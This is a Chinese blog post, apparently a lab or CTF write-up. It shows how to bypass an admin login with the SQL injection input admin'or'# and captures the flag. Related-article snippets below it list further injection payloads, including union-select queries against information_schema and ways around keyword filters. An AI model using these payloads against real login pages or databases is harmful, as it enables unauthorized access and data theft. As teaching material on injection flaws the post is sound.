Sql注入实验 三

最新推荐文章于 2023-04-10 16:02:18 发布
最新推荐文章于 2023-04-10 16:02:18 发布
阅读量282 收藏
点赞数 1
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nocker888/article/details/103006287
版权

Sql注入实验 三 绕过登入

对于绕过后台登入的实验,我们通过前面的注入已经拿到了md5 解密就可以去登入后台了,但是我们并不满求这一个方法,难道就不能直接登入?

得到后台登入地址
在这里插入图片描述

后台看不出什么通过分析代码,和尝试输入 '登入 报错 那么报错会证明什么了
在这里插入图片描述

那么登入语句一定是这样的

select name.passwd from users where username=‘name’ and password=‘pwd’;

如果我们输入正确的用户密码,是一定能查询正确,如果我们通过一下特殊部分比如注释 影响查询语句,是不是就能登入了?
这里admin用户是一定存在的

select name.passwd from users where username='admin'or'#' and password=‘pwd’;

我们分析下语义,在SQL语法中 # 是注释符,所以后面的语句都会杯注释掉,那么上面的语句就等价于

select name.passwd from users where username=’admin'or'

成功登入 拿到flag
在这里插入图片描述

庸人自扰#7
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入学习
Elvira
09-09 437
在无法访问information_schema的情况下,如何猜列名、表名等 burp suite
简单的sql注入之一 (实验吧)
wewww111的博客
08-11 3789
1.判断注入类型 1' or '1' = '1 结果如下 测试几个简单的语句后, 1' order by 1 # , 1' select 1 # 根据报错信息 #  -- - order by select 等关键词都被过滤 关键词被过滤:解决方法如下 1大小写交替: Order SeLect  2.双写  : OderOrder SelectSelect  3.交叉: sele...
实验吧简单的sql注入之3WP
Yale的博客
03-19 1457
就上图不说话(sqlmap) 这种题目对于初学sqlmap的人还是很好玩的
记录并总结一次简单的SQL注入实验——这个看起来有点简单!
Di_iii的博客
03-22 688
http://www.shiyanbar.com/ctf/33 id=%27 报错,是mysql id=1 and 1=1 正常,存在sql注入 id=1 order by 2 查表名 id=1%20union%20select%20null,group_concat(table_name)%20from%20information_schema.tables%20where%20table_sc...
简单的sql注入之2——实验
weixin_34326179的博客
07-11 147
刚刚做了实验吧的题目,现在整理一下 写出解题思路,希望能够帮助到那些需要帮助的人 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! 永远爱你们的————新宝宝 简单的sql注入之2分值:10 来源:北邮天枢战队 难度:中 参与人数:9517人 Get Flag:4472人 答题人数...
SQL注入相关实验报告.doc
01-05
实验报告主要涉及两种SQL注入技术:REGXP正则匹配和基于时间的判断。 **一、REGXP正则匹配** 在实验中,攻击者利用正则表达式的特性来逐步揭示数据库信息。例如,通过`Limit 0,1`来获取单个字符,并结合正则递增...
软件安全实验2 SQL注入实验
最新发布
06-19
分别是Brute Force(暴力破解)、Command Injection(命令行注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)、File Upload(文件上传)、Insecure CAPTCHA (不安全的验证码)、SQL Injection(SQL注入)...
SQL注入攻击实验报告
05-07
SQL注入攻击实验报告,自己写了试验的网站,举了一些基本的攻击和防御方法,有xp_cmdshell的执行,用的是sqlserver 2005
常规漏洞利用-sql注入实验指导书.pdf
08-03
常规漏洞利用-sql注入实验指导书#资源分享达人#
sql注入实验
11-28
锐捷网络大学,isec网络攻防实验sql注入文档详解。。。
SQL 注入 DVWA 实验
m0_63645854的博客
04-10 2053
SQL注入与自动注入
SQL注入详细步骤讲解
m0_66460483的博客
07-30 1173
SQL注入详细步骤讲解 1、Get型 整型与字符型注入判断: 举例: http://xxx/xxx/Less-1/?id=1 and 1=1 --+ 输入?id=1 and 1=1 --+正常,输入?id=1 and 1=2 --+报错,可判断为整型注入。 http://xxx.xxx/Less-1/?id=1' 输入?id=1'出现报错,输入?id=1''正常,可判断为字符型注入。 http://xxx.xxx/Less-1/?id=1...
Sql注入实验
Nocker888的博客
11-11 432
Sql注入实验一Sql 注入 实验 一总结 青春一经典当即永不再赎 不怕自己笨,就怕那些比自己笨的人比自己还要努力 Sql 注入 实验 一 在得到靶机的情况下,寻找带有参数的地方就有一定有注入点。 开干,首先是判断注入点 payload如下: // 数字型判断 ?id=1 and 1=1 ?id=1 and 1=2 // 字符型判断 ?id=1' and...
蓝盾实训营day1——配置渗透环境和SQL注入
mingC0758的博客
07-09 782
蓝盾实训营day1——配置渗透环境和SQL注入 有幸参加了蓝盾在学校办的10天的实训营,把过程笔记发到这里,希望可以分享给更多的人。 黑客是如何入侵的 踩点 whois 扫描 nmap 提权 破坏 后门 搜索网络设备 shodan.io 远程摄像头…… 搜索jaws/1.0 country:”CN” windows服务器 不开源 收费 nma...
web渗透测试
05-08
Web渗透测试教程,该课程侧重于讲解Web安全,并通过实验详细分析常见的十种Web漏洞、漏洞利用过程等。
简单的sql注入1-3详解及相关阅读(实验吧)
zhy的博客
12-29 2220
题外话:更多关于信息安全、网络技术方面的东西,可以参考我的博客,也许你能找到你想看的? https://www.xiaozzz.xyz/ 1 简单的Sql注入 类型:sql注入 题目链接: http://www.shiyanbar.com/ctf/1875 解题过程: 打开页面看到一个输入框和提交,先尝试输入一些简单的东西,发现输入1 2 3都是有结果的,输入4之后没有结果。 按照...
实验吧简单的sql注入--题答案一样--_--
Gunther的博客
09-03 5294
简单的sql注入 关键字被过滤了 空格被过滤了 1'/**/unionunion/**/selectselect/**/table_name/**/fromfrom/**/information_schema.tables/**/wherewhere/**//**/'1'='1 这样尝试爆出表名来,居然报错,好吧 我来两个空格(空格被过滤了),估计是有个过滤函数 1'
简单SQL注入实验
qq_43518594的博客
10-30 3255
一、什么是SQL注入 SQL攻击(英语:SQL injection),简称注入攻击,是发生于应用程序之数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了检查,那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。 二、SQL注入原理 一般情况下,用户登录的SQL语句为select * from users where user=$username and pw=$password ;这里的username和password分别
渗透测试——SQL注入实验(Sqlmap)
YT的博客
02-11 6338
实验环境 本实验中,OWASP Web服务器靶机(10.10.10.129,对外公开域名:www.dvssc.com)含有 SQL注入漏洞,在攻击机 BT5 R1 (10.10.10.128)上通过工具进行攻击。 工具:sqlmap、Firefox浏览器内置的 Tamper Data 1. 输入 www.dvssc.com (或10.10.10.129) 登录要攻击的网站,点击登录界面 2....
sqli-labs实验指导手册
11-17
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值